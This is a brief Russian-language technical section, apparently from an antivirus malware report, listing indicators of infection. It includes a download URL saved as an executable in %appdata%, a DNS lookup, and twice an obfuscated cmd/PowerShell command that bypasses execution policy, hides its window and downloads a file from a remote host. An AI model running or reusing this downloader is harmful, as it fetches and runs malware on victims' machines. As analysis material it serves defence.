Техническая информация
- http://www.zonedopesa.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^OwersH^eL^l^.^eXE^ ^-ex^ec^UT^i^onP^Olicy^ ^bY^pASS ^-No^pRo^fi^LE^ ^-Win^D^OWStY^Le H^Id^de^N ^(nE^w-OB^je^C^T ^sy^S^t^E^M.^net.W^EB^c^LiEnt^).do^wNloa^Dfi^l^e(^'http://www...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "p^OwersH^eL^l^.^eXE^ ^-ex^ec^UT^i^onP^Olicy^ ^bY^pASS ^-No^pRo^fi^LE^ ^-Win^D^OWStY^Le H^Id^de^N ^(nE^w-OB^je^C^T ^sy^S^t^E^M.^net.W^EB^c^LiEnt^).do^wNloa^Dfi^l^e(^'http://www...' (со скрытым окном)